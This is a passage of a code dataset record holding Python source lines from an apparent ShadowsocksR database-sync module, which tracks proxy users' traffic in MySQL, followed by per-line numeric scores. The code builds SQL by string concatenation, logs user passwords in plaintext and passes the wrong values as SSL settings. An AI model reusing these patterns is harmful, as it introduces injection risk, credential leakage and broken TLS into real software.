curr_transfer[id][1] > self.last_get_transfer[id][0] + self.last_get_transfer[id][1]:\n", "\t\t\t\t\tself.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1]\n", "\t\t\telse:\n", "\t\t\t\tself.onlineuser_cache[id] = curr_transfer[id][0] + curr_transfer[id][1]\n", "\t\tself.onlineuser_cache.sweep()\n", "\n", "\t\tupdate_transfer = self.update_all_user(dt_transfer)\n", "\t\tfor id in update_transfer.keys():\n", "\t\t\tlast = self.last_update_transfer.get(id, [0,0])\n", "\t\t\tself.last_update_transfer[id] = [last[0] + update_transfer[id][0], last[1] + update_transfer[id][1]]\n", "\t\tself.last_get_transfer = curr_transfer\n", "\n", "\tdef del_server_out_of_bound_safe(self, last_rows, rows):\n", "\t\t#停止超流量的服务\n", "\t\t#启动没超流量的服务\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\texcept Exception as e:\n", "\t\t\tlogging.error('load switchrule.py fail')\n", "\t\tcur_servers = {}\n", "\t\tnew_servers = {}\n", "\t\tfor row in rows:\n", "\t\t\ttry:\n", "\t\t\t\tallow = switchrule.isTurnOn(row) and row['enable'] == 1 and row['u'] + row['d'] < row['transfer_enable']\n", "\t\t\texcept Exception as e:\n", "\t\t\t\tallow = False\n", "\n", "\t\t\tport = row['port']\n", "\t\t\tpasswd = common.to_bytes(row['passwd'])\n", "\t\t\tcfg = {'password': passwd}\n", "\t\t\tif 'id' in row:\n", "\t\t\t\tself.port_uid_table[row['port']] = row['id']\n", "\n", "\t\t\tread_config_keys = ['method', 'obfs', 'obfs_param', 'protocol', 'protocol_param', 'forbidden_ip', 'forbidden_port']\n", "\t\t\tfor name in read_config_keys:\n", "\t\t\t\tif name in row and row[name]:\n", "\t\t\t\t\tcfg[name] = row[name]\n", "\n", "\t\t\tmerge_config_keys = ['password'] + read_config_keys\n", "\t\t\tfor name in cfg.keys():\n", "\t\t\t\tif hasattr(cfg[name], 'encode'):\n", "\t\t\t\t\tcfg[name] = cfg[name].encode('utf-8')\n", "\n", "\t\t\tif port not in cur_servers:\n", "\t\t\t\tcur_servers[port] = passwd\n", "\t\t\telse:\n", "\t\t\t\tlogging.error('more than one user use 
the same port [%s]' % (port,))\n", "\t\t\t\tcontinue\n", "\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tif not allow:\n", "\t\t\t\t\tlogging.info('db stop server at port [%s]' % (port,))\n", "\t\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\t\t\telse:\n", "\t\t\t\t\tcfgchange = False\n", "\t\t\t\t\tif port in ServerPool.get_instance().tcp_servers_pool:\n", "\t\t\t\t\t\trelay = ServerPool.get_instance().tcp_servers_pool[port]\n", "\t\t\t\t\t\tfor name in merge_config_keys:\n", "\t\t\t\t\t\t\tif name in cfg and not self.cmp(cfg[name], relay._config[name]):\n", "\t\t\t\t\t\t\t\tcfgchange = True\n", "\t\t\t\t\t\t\t\tbreak;\n", "\t\t\t\t\tif not cfgchange and port in ServerPool.get_instance().tcp_ipv6_servers_pool:\n", "\t\t\t\t\t\trelay = ServerPool.get_instance().tcp_ipv6_servers_pool[port]\n", "\t\t\t\t\t\tfor name in merge_config_keys:\n", "\t\t\t\t\t\t\tif name in cfg and not self.cmp(cfg[name], relay._config[name]):\n", "\t\t\t\t\t\t\t\tcfgchange = True\n", "\t\t\t\t\t\t\t\tbreak;\n", "\t\t\t\t\t#config changed\n", "\t\t\t\t\tif cfgchange:\n", "\t\t\t\t\t\tlogging.info('db stop server at port [%s] reason: config changed: %s' % (port, cfg))\n", "\t\t\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\t\t\t\t\tnew_servers[port] = (passwd, cfg)\n", "\n", "\t\t\telif allow and ServerPool.get_instance().server_run_status(port) is False:\n", "\t\t\t\t#new_servers[port] = passwd\n", "\t\t\t\tprotocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin'))\n", "\t\t\t\tobfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain'))\n", "\t\t\t\tlogging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs))\n", "\t\t\t\tServerPool.get_instance().new_server(port, cfg)\n", "\n", "\t\tfor row in last_rows:\n", "\t\t\tif row['port'] in cur_servers:\n", "\t\t\t\tpass\n", "\t\t\telse:\n", "\t\t\t\tlogging.info('db stop server at port 
[%s] reason: port not exist' % (row['port']))\n", "\t\t\t\tServerPool.get_instance().cb_del_server(row['port'])\n", "\t\t\t\tif row['port'] in self.port_uid_table:\n", "\t\t\t\t\tdel self.port_uid_table[row['port']]\n", "\n", "\t\tif len(new_servers) > 0:\n", "\t\t\tfrom shadowsocks import eventloop\n", "\t\t\tself.event.wait(eventloop.TIMEOUT_PRECISION + eventloop.TIMEOUT_PRECISION / 2)\n", "\t\t\tfor port in new_servers.keys():\n", "\t\t\t\tpasswd, cfg = new_servers[port]\n", "\t\t\t\tprotocol = cfg.get('protocol', ServerPool.get_instance().config.get('protocol', 'origin'))\n", "\t\t\t\tobfs = cfg.get('obfs', ServerPool.get_instance().config.get('obfs', 'plain'))\n", "\t\t\t\tlogging.info('db start server at port [%s] pass [%s] protocol [%s] obfs [%s]' % (port, passwd, protocol, obfs))\n", "\t\t\t\tServerPool.get_instance().new_server(port, cfg)\n", "\n", "\tdef cmp(self, val1, val2):\n", "\t\tif type(val1) is bytes:\n", "\t\t\tval1 = common.to_str(val1)\n", "\t\tif type(val2) is bytes:\n", "\t\t\tval2 = common.to_str(val2)\n", "\t\treturn val1 == val2\n", "\n", "\t@staticmethod\n", "\tdef del_servers():\n", "\t\tfor port in [v for v in ServerPool.get_instance().tcp_servers_pool.keys()]:\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\t\tfor port in [v for v in ServerPool.get_instance().tcp_ipv6_servers_pool.keys()]:\n", "\t\t\tif ServerPool.get_instance().server_is_run(port) > 0:\n", "\t\t\t\tServerPool.get_instance().cb_del_server(port)\n", "\n", "\t@staticmethod\n", "\tdef thread_db(obj):\n", "\t\timport socket\n", "\t\timport time\n", "\t\tglobal db_instance\n", "\t\ttimeout = 60\n", "\t\tsocket.setdefaulttimeout(timeout)\n", "\t\tlast_rows = []\n", "\t\tdb_instance = obj()\n", "\t\ttry:\n", "\t\t\twhile True:\n", "\t\t\t\tload_config()\n", "\t\t\t\tdb_instance.load_cfg()\n", "\t\t\t\ttry:\n", "\t\t\t\t\tdb_instance.push_db_all_user()\n", "\t\t\t\t\trows = 
db_instance.pull_db_all_user()\n", "\t\t\t\t\tif rows:\n", "\t\t\t\t\t\tdb_instance.pull_ok = True\n", "\t\t\t\t\tdb_instance.del_server_out_of_bound_safe(last_rows, rows)\n", "\t\t\t\t\tlast_rows = rows\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\ttrace = traceback.format_exc()\n", "\t\t\t\t\tlogging.error(trace)\n", "\t\t\t\t\t#logging.warn('db thread except:%s' % e)\n", "\t\t\t\tif db_instance.event.wait(get_config().UPDATE_TIME) or not ServerPool.get_instance().thread.is_alive():\n", "\t\t\t\t\tbreak\n", "\t\texcept KeyboardInterrupt as e:\n", "\t\t\tpass\n", "\t\tdb_instance.del_servers()\n", "\t\tServerPool.get_instance().stop()\n", "\t\tdb_instance = None\n", "\n", "\t@staticmethod\n", "\tdef thread_db_stop():\n", "\t\tglobal db_instance\n", "\t\tdb_instance.event.set()\n", "\n", "class DbTransfer(TransferBase):\n", "\tdef __init__(self):\n", "\t\tsuper(DbTransfer, self).__init__()\n", "\t\tself.cfg = {\n", "\t\t\t\"host\": \"127.0.0.1\",\n", "\t\t\t\"port\": 3306,\n", "\t\t\t\"user\": \"ss\",\n", "\t\t\t\"password\": \"pass\",\n", "\t\t\t\"db\": \"shadowsocks\",\n", "\t\t\t\"node_id\": 1,\n", "\t\t\t\"transfer_mul\": 1.0,\n", "\t\t\t\"ssl_enable\": 0,\n", "\t\t\t\"ssl_ca\": \"\",\n", "\t\t\t\"ssl_cert\": \"\",\n", "\t\t\t\"ssl_key\": \"\"}\n", "\t\tself.load_cfg()\n", "\n", "\tdef load_cfg(self):\n", "\t\timport json\n", "\t\tconfig_path = get_config().MYSQL_CONFIG\n", "\t\tcfg = None\n", "\t\twith open(config_path, 'r+') as f:\n", "\t\t\tcfg = json.loads(f.read().decode('utf8'))\n", "\n", "\t\tif cfg:\n", "\t\t\tself.cfg.update(cfg)\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport cymysql\n", "\t\tupdate_transfer = {}\n", "\t\t\n", "\t\tquery_head = 'UPDATE user'\n", "\t\tquery_sub_when = ''\n", "\t\tquery_sub_when2 = ''\n", "\t\tquery_sub_in = None\n", "\t\tlast_time = time.time()\n", "\n", "\t\tfor id in dt_transfer.keys():\n", "\t\t\ttransfer = dt_transfer[id]\n", "\t\t\tupdate_trs = 1024 * max(2048 - self.user_pass.get(id, 0) 
* 64, 16)\n", "\t\t\tif transfer[0] + transfer[1] < update_trs:\n", "\t\t\t\tcontinue\n", "\t\t\tif id in self.user_pass:\n", "\t\t\t\tdel self.user_pass[id]\n", "\n", "\t\t\tquery_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tquery_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tupdate_transfer[id] = transfer\n", "\n", "\t\t\tif query_sub_in is not None:\n", "\t\t\t\tquery_sub_in += ',%s' % id\n", "\t\t\telse:\n", "\t\t\t\tquery_sub_in = '%s' % id\n", "\n", "\t\tif query_sub_when == '':\n", "\t\t\treturn update_transfer\n", "\t\tquery_sql = query_head + ' SET u = CASE port' + query_sub_when + \\\n", "\t\t\t\t\t' END, d = CASE port' + query_sub_when2 + \\\n", "\t\t\t\t\t' END, t = ' + str(int(last_time)) + \\\n", "\t\t\t\t\t' WHERE port IN (%s)' % query_sub_in\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", "\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\n", "\t\tcur = conn.cursor()\n", "\t\tcur.execute(query_sql)\n", "\t\tcur.close()\n", "\t\tconn.commit()\n", "\t\tconn.close()\n", "\t\treturn update_transfer\n", "\n", "\tdef pull_db_all_user(self):\n", "\t\timport cymysql\n", "\t\t#数据库所有用户信息\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", 
"\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\n", "\t\trows = self.pull_db_users(conn)\n", "\t\tconn.close()\n", "\t\treturn rows\n", "\n", "\tdef pull_db_users(self, conn):\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\t\tkeys = switchrule.getKeys(self.key_list)\n", "\t\texcept Exception as e:\n", "\t\t\tkeys = self.key_list\n", "\n", "\t\tcur = conn.cursor()\n", "\t\tcur.execute(\"SELECT \" + ','.join(keys) + \" FROM user\")\n", "\t\trows = []\n", "\t\tfor r in cur.fetchall():\n", "\t\t\td = {}\n", "\t\t\tfor column in range(len(keys)):\n", "\t\t\t\td[keys[column]] = r[column]\n", "\t\t\trows.append(d)\n", "\t\tcur.close()\n", "\t\treturn rows\n", "\n", "class Dbv3Transfer(DbTransfer):\n", "\tdef __init__(self):\n", "\t\tsuper(Dbv3Transfer, self).__init__()\n", "\t\tself.key_list += ['id', 'method']\n", "\t\tif get_config().API_INTERFACE == 'sspanelv3ssr':\n", "\t\t\tself.key_list += ['obfs', 'protocol', 'obfs_param', 'protocol_param']\n", "\t\tself.start_time = time.time()\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport cymysql\n", "\t\tupdate_transfer = {}\n", "\n", "\t\tquery_head = 'UPDATE user'\n", "\t\tquery_sub_when = ''\n", "\t\tquery_sub_when2 = ''\n", "\t\tquery_sub_in = None\n", "\t\tlast_time = time.time()\n", "\n", "\t\talive_user_count = len(self.onlineuser_cache)\n", "\t\tbandwidth_thistime = 0\n", "\n", "\t\tif self.cfg[\"ssl_enable\"] == 1:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8',\n", 
"\t\t\t\t\tssl={'ca':self.cfg[\"ssl_enable\"],'cert':self.cfg[\"ssl_enable\"],'key':self.cfg[\"ssl_enable\"]})\n", "\t\telse:\n", "\t\t\tconn = cymysql.connect(host=self.cfg[\"host\"], port=self.cfg[\"port\"],\n", "\t\t\t\t\tuser=self.cfg[\"user\"], passwd=self.cfg[\"password\"],\n", "\t\t\t\t\tdb=self.cfg[\"db\"], charset='utf8')\n", "\t\tconn.autocommit(True)\n", "\n", "\t\tfor id in dt_transfer.keys():\n", "\t\t\ttransfer = dt_transfer[id]\n", "\t\t\tbandwidth_thistime = bandwidth_thistime + transfer[0] + transfer[1]\n", "\n", "\t\t\tupdate_trs = 1024 * max(2048 - self.user_pass.get(id, 0) * 64, 16)\n", "\t\t\tif transfer[0] + transfer[1] < update_trs:\n", "\t\t\t\tself.user_pass[id] = self.user_pass.get(id, 0) + 1\n", "\t\t\t\tcontinue\n", "\t\t\tif id in self.user_pass:\n", "\t\t\t\tdel self.user_pass[id]\n", "\n", "\t\t\tquery_sub_when += ' WHEN %s THEN u+%s' % (id, int(transfer[0] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tquery_sub_when2 += ' WHEN %s THEN d+%s' % (id, int(transfer[1] * self.cfg[\"transfer_mul\"]))\n", "\t\t\tupdate_transfer[id] = transfer\n", "\n", "\t\t\tcur = conn.cursor()\n", "\t\t\ttry:\n", "\t\t\t\tif id in self.port_uid_table:\n", "\t\t\t\t\tcur.execute(\"INSERT INTO `user_traffic_log` (`id`, `user_id`, `u`, `d`, `node_id`, `rate`, `traffic`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\t\tstr(self.port_uid_table[id]) + \"', '\" + str(transfer[0]) + \"', '\" + str(transfer[1]) + \"', '\" + \\\n", "\t\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(self.cfg[\"transfer_mul\"]) + \"', '\" + \\\n", "\t\t\t\t\t\tself.traffic_format((transfer[0] + transfer[1]) * self.cfg[\"transfer_mul\"]) + \"', unix_timestamp()); \")\n", "\t\t\texcept:\n", "\t\t\t\tlogging.warn('no `user_traffic_log` in db')\n", "\t\t\tcur.close()\n", "\n", "\t\t\tif query_sub_in is not None:\n", "\t\t\t\tquery_sub_in += ',%s' % id\n", "\t\t\telse:\n", "\t\t\t\tquery_sub_in = '%s' % id\n", "\n", "\t\tif query_sub_when != '':\n", "\t\t\tquery_sql = query_head + ' 
SET u = CASE port' + query_sub_when + \\\n", "\t\t\t\t\t\t' END, d = CASE port' + query_sub_when2 + \\\n", "\t\t\t\t\t\t' END, t = ' + str(int(last_time)) + \\\n", "\t\t\t\t\t\t' WHERE port IN (%s)' % query_sub_in\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(query_sql)\n", "\t\t\tcur.close()\n", "\n", "\t\ttry:\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(\"INSERT INTO `ss_node_online_log` (`id`, `node_id`, `online_user`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(alive_user_count) + \"', unix_timestamp()); \")\n", "\t\t\tcur.close()\n", "\n", "\t\t\tcur = conn.cursor()\n", "\t\t\tcur.execute(\"INSERT INTO `ss_node_info_log` (`id`, `node_id`, `uptime`, `load`, `log_time`) VALUES (NULL, '\" + \\\n", "\t\t\t\t\tstr(self.cfg[\"node_id\"]) + \"', '\" + str(self.uptime()) + \"', '\" + \\\n", "\t\t\t\t\tstr(self.load()) + \"', unix_timestamp()); \")\n", "\t\t\tcur.close()\n", "\t\texcept:\n", "\t\t\tlogging.warn('no `ss_node_online_log` or `ss_node_info_log` in db')\n", "\n", "\t\tconn.close()\n", "\t\treturn update_transfer\n", "\n", "\tdef pull_db_users(self, conn):\n", "\t\ttry:\n", "\t\t\tswitchrule = importloader.load('switchrule')\n", "\t\t\tkeys = switchrule.getKeys(self.key_list)\n", "\t\texcept Exception as e:\n", "\t\t\tkeys = self.key_list\n", "\n", "\t\tcur = conn.cursor()\n", "\n", "\t\tnode_info_keys = ['traffic_rate']\n", "\t\tcur.execute(\"SELECT \" + ','.join(node_info_keys) +\" FROM ss_node where `id`='\" + str(self.cfg[\"node_id\"]) + \"'\")\n", "\t\tnodeinfo = cur.fetchone()\n", "\n", "\t\tif nodeinfo == None:\n", "\t\t\trows = []\n", "\t\t\tcur.close()\n", "\t\t\tconn.commit()\n", "\t\t\treturn rows\n", "\t\tcur.close()\n", "\n", "\t\tnode_info_dict = {}\n", "\t\tfor column in range(len(nodeinfo)):\n", "\t\t\tnode_info_dict[node_info_keys[column]] = nodeinfo[column]\n", "\t\tself.cfg['transfer_mul'] = float(node_info_dict['traffic_rate'])\n", "\n", "\t\tcur = conn.cursor()\n", 
"\t\tcur.execute(\"SELECT \" + ','.join(keys) + \" FROM user\")\n", "\t\trows = []\n", "\t\tfor r in cur.fetchall():\n", "\t\t\td = {}\n", "\t\t\tfor column in range(len(keys)):\n", "\t\t\t\td[keys[column]] = r[column]\n", "\t\t\trows.append(d)\n", "\t\tcur.close()\n", "\t\treturn rows\n", "\n", "\tdef load(self):\n", "\t\timport os\n", "\t\treturn os.popen(\"cat /proc/loadavg | awk '{ print $1\\\" \\\"$2\\\" \\\"$3 }'\").readlines()[0]\n", "\n", "\tdef uptime(self):\n", "\t\treturn time.time() - self.start_time\n", "\n", "\tdef traffic_format(self, traffic):\n", "\t\tif traffic < 1024 * 8:\n", "\t\t\treturn str(int(traffic)) + \"B\";\n", "\n", "\t\tif traffic < 1024 * 1024 * 2:\n", "\t\t\treturn str(round((traffic / 1024.0), 2)) + \"KB\";\n", "\n", "\t\treturn str(round((traffic / 1048576.0), 2)) + \"MB\";\n", "\n", "class MuJsonTransfer(TransferBase):\n", "\tdef __init__(self):\n", "\t\tsuper(MuJsonTransfer, self).__init__()\n", "\n", "\tdef update_all_user(self, dt_transfer):\n", "\t\timport json\n", "\t\trows = None\n", "\n", "\t\tconfig_path = get_config().MUDB_FILE\n", "\t\twith open(config_path, 'rb+') as f:\n", "\t\t\trows = json.loads(f.read().decode('utf8'))\n", "\t\t\tfor row in rows:\n", "\t\t\t\tif \"port\" in row:\n", "\t\t\t\t\tport = row[\"port\"]\n", "\t\t\t\t\tif port in dt_transfer:\n", "\t\t\t\t\t\trow[\"u\"] += dt_transfer[port][0]\n", "\t\t\t\t\t\trow[\"d\"] += dt_transfer[port][1]\n", "\n", "\t\tif rows:\n", "\t\t\toutput = json.dumps(rows, sort_keys=True, indent=4, separators=(',', ': '))\n", "\t\t\twith open(config_path, 'r+') as f:\n", "\t\t\t\tf.write(output)\n", "\t\t\t\tf.truncate()\n", "\n", "\t\treturn dt_transfer\n", "\n", "\tdef pull_db_all_user(self):\n", "\t\timport json\n", "\t\trows = None\n", "\n", "\t\tconfig_path = get_config().MUDB_FILE\n", "\t\twith open(config_path, 'rb+') as f:\n", "\t\t\trows = json.loads(f.read().decode('utf8'))\n", "\t\t\tfor row in rows:\n", "\t\t\t\ttry:\n", "\t\t\t\t\tif 'forbidden_ip' in row:\n", 
"\t\t\t\t\t\trow['forbidden_ip'] = common.IPNetwork(row['forbidden_ip'])\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\tlogging.error(e)\n", "\t\t\t\ttry:\n", "\t\t\t\t\tif 'forbidden_port' in row:\n", "\t\t\t\t\t\trow['forbidden_port'] = common.PortRange(row['forbidden_port'])\n", "\t\t\t\texcept Exception as e:\n", "\t\t\t\t\tlogging.error(e)\n", "\n", "\t\treturn rows\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0.047619047619047616, 0.05263157894736842, 0.030303030303030304, 0.013157894736842105, 0.03333333333333333, 0.030303030303030304, 0.045454545454545456, 0.037037037037037035, 0.016666666666666666, 0.043478260869565216, 0, 0.047619047619047616, 0.14285714285714285, 0, 0.034482758620689655, 0.03571428571428571, 0.1, 0.14285714285714285, 0.022727272727272728, 0.014925373134328358, 0.16666666666666666, 0.05263157894736842, 0.029411764705882353, 0.037037037037037035, 0.019417475728155338, 0.07142857142857142, 0.017241379310344827, 0.038461538461538464, 0.014492753623188406, 0.03636363636363636, 0.1, 0.014705882352941176, 0.1111111111111111, 0.017543859649122806, 0.07142857142857142, 0.014925373134328358, 0.027777777777777776, 0.017241379310344827, 0.012987012987012988, 0.1111111111111111, 0.013157894736842105, 0.03125, 0, 0.018518518518518517, 0.027777777777777776, 0.0392156862745098, 0.019230769230769232, 0.024390243902439025, 0, 0.017241379310344827, 0.16666666666666666, 0.15384615384615385, 0.14285714285714285, 0.020833333333333332, 0.04, 0.022727272727272728, 0.05263157894736842, 0.05263157894736842, 0.05263157894736842, 0.125, 0.01834862385321101, 0.038461538461538464, 0.05555555555555555, 0, 0.045454545454545456, 0.023255813953488372, 0.03333333333333333, 0.05263157894736842, 0.02040816326530612, 0, 0.01680672268907563, 0.030303030303030304, 0.029411764705882353, 0.037037037037037035, 0, 0.01818181818181818, 0.037037037037037035, 0.02702702702702703, 0.023255813953488372, 0, 0.03225806451612903, 0.03225806451612903, 0.1111111111111111, 0.0136986301369863, 0.07692307692307693, 0, 0.017543859649122806, 0.05555555555555555, 0.01694915254237288, 0.0196078431372549, 0.1, 0.043478260869565216, 0.016666666666666666, 0.015873015873015872, 0.02702702702702703, 0.013888888888888888, 0.04, 0.13333333333333333, 0.024096385542168676, 0.014705882352941176, 0.02702702702702703, 0.013888888888888888, 0.04, 
0.13333333333333333, 0.09523809523809523, 0.05263157894736842, 0.02197802197802198, 0.019230769230769232, 0.025, 0, 0.01282051282051282, 0.0625, 0.021052631578947368, 0.024390243902439025, 0.017241379310344827, 0.019230769230769232, 0, 0.041666666666666664, 0.029411764705882353, 0.1111111111111111, 0.1111111111111111, 0.022988505747126436, 0.017543859649122806, 0.023255813953488372, 0.023809523809523808, 0, 0.037037037037037035, 0.02702702702702703, 0.024390243902439025, 0.02857142857142857, 0.027777777777777776, 0.021052631578947368, 0.024390243902439025, 0.017241379310344827, 0.019230769230769232, 0, 0.03571428571428571, 0.038461538461538464, 0.03333333333333333, 0.038461538461538464, 0.03333333333333333, 0.045454545454545456, 0, 0.06666666666666667, 0.05, 0.01282051282051282, 0.017543859649122806, 0.02, 0.024096385542168676, 0.017543859649122806, 0.02, 0, 0.06666666666666667, 0.047619047619047616, 0.0625, 0.07142857142857142, 0.047619047619047616, 0.06666666666666667, 0.027777777777777776, 0.058823529411764705, 0.045454545454545456, 0.14285714285714285, 0.06666666666666667, 0.05555555555555555, 0.037037037037037035, 0.1111111111111111, 0.027777777777777776, 0.023255813953488372, 0.07142857142857142, 0.030303030303030304, 0.015873015873015872, 0.045454545454545456, 0.037037037037037035, 0.027777777777777776, 0.038461538461538464, 0.043478260869565216, 0.018518518518518517, 0.09090909090909091, 0.030303030303030304, 0.125, 0.03571428571428571, 0.02857142857142857, 0.047619047619047616, 0, 0.06666666666666667, 0.043478260869565216, 0.047619047619047616, 0.038461538461538464, 0, 0.03125, 0.047619047619047616, 0.02702702702702703, 0.06666666666666667, 0.041666666666666664, 0.058823529411764705, 0.058823529411764705, 0.043478260869565216, 0.041666666666666664, 0.058823529411764705, 0.041666666666666664, 0.05, 0.058823529411764705, 0.05263157894736842, 0.05555555555555555, 0.05555555555555555, 0, 0.047619047619047616, 0.07142857142857142, 0.023809523809523808, 
0.07692307692307693, 0.02702702702702703, 0.022222222222222223, 0, 0.1, 0.041666666666666664, 0, 0.024390243902439025, 0.058823529411764705, 0.043478260869565216, 0.6666666666666666, 0.034482758620689655, 0.045454545454545456, 0.043478260869565216, 0.045454545454545456, 0.038461538461538464, 0, 0.03125, 0.03333333333333333, 0.014285714285714285, 0.021739130434782608, 0.07692307692307693, 0.03571428571428571, 0.037037037037037035, 0, 0.02127659574468085, 0.021052631578947368, 0.029411764705882353, 0, 0.03125, 0.03225806451612903, 0.1111111111111111, 0.034482758620689655, 0, 0.037037037037037035, 0.038461538461538464, 0.014492753623188406, 0.04081632653061224, 0.022727272727272728, 0.023809523809523808, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 0.03508771929824561, 0.025, 0, 0.045454545454545456, 0.04, 0.07142857142857142, 0.0625, 0.06666666666666667, 0.04, 0, 0.034482758620689655, 0.058823529411764705, 0.15384615384615385, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 0.03508771929824561, 0.025, 0, 0.029411764705882353, 0.06666666666666667, 0.07142857142857142, 0, 0.03125, 0.14285714285714285, 0.020833333333333332, 0.022727272727272728, 0.04, 0.041666666666666664, 0, 0.045454545454545456, 0.017543859649122806, 0.08333333333333333, 0.037037037037037035, 0.1, 0.02857142857142857, 0.03125, 0.05555555555555555, 0.07142857142857142, 0.07142857142857142, 0, 0.03125, 0.047619047619047616, 0.02564102564102564, 0.027777777777777776, 0.0196078431372549, 0.0136986301369863, 0.03125, 0, 0.024390243902439025, 0.058823529411764705, 0.043478260869565216, 0, 0.034482758620689655, 0.045454545454545456, 0.043478260869565216, 0.045454545454545456, 0.038461538461538464, 0, 0.020833333333333332, 0.04, 0, 0.029411764705882353, 0.013888888888888888, 0.03508771929824561, 0.025, 0.0707070707070707, 0.125, 0.013888888888888888, 
0.03508771929824561, 0.025, 0.041666666666666664, 0, 0.03125, 0.03333333333333333, 0.014084507042253521, 0, 0.014285714285714285, 0.021739130434782608, 0.01818181818181818, 0.07692307692307693, 0.03571428571428571, 0.037037037037037035, 0, 0.02127659574468085, 0.021052631578947368, 0.029411764705882353, 0, 0.043478260869565216, 0.125, 0.029411764705882353, 0.02142857142857143, 0.038461538461538464, 0.03529411764705882, 0.01818181818181818, 0.18181818181818182, 0.020833333333333332, 0.06666666666666667, 0, 0.03125, 0.03225806451612903, 0.1111111111111111, 0.034482758620689655, 0, 0.037037037037037035, 0.014285714285714285, 0.02, 0.022222222222222223, 0.023255813953488372, 0.043478260869565216, 0.038461538461538464, 0.06666666666666667, 0, 0.14285714285714285, 0.043478260869565216, 0.02608695652173913, 0.03296703296703297, 0.06666666666666667, 0, 0.043478260869565216, 0.02586206896551724, 0.0410958904109589, 0.02, 0.06666666666666667, 0.2, 0.014084507042253521, 0, 0.06666666666666667, 0.04, 0, 0.03125, 0.14285714285714285, 0.020833333333333332, 0.022727272727272728, 0.04, 0.041666666666666664, 0, 0.045454545454545456, 0, 0.027777777777777776, 0.02608695652173913, 0.03571428571428571, 0, 0.08695652173913043, 0.07692307692307693, 0.06666666666666667, 0.058823529411764705, 0.06666666666666667, 0.07142857142857142, 0, 0.045454545454545456, 0.02631578947368421, 0.01639344262295082, 0.014925373134328358, 0, 0.045454545454545456, 0.017543859649122806, 0.08333333333333333, 0.037037037037037035, 0.1, 0.02857142857142857, 0.03125, 0.05555555555555555, 0.07142857142857142, 0.07142857142857142, 0, 0.058823529411764705, 0.08333333333333333, 0.02247191011235955, 0, 0.05263157894736842, 0.02564102564102564, 0, 0.027777777777777776, 0.04, 0.05714285714285714, 0, 0.03125, 0.038461538461538464, 0, 0.037037037037037035, 0, 0.027777777777777776, 0.047619047619047616, 0.024390243902439025, 0, 0.024390243902439025, 0.07142857142857142, 0.07142857142857142, 0, 0.02564102564102564, 
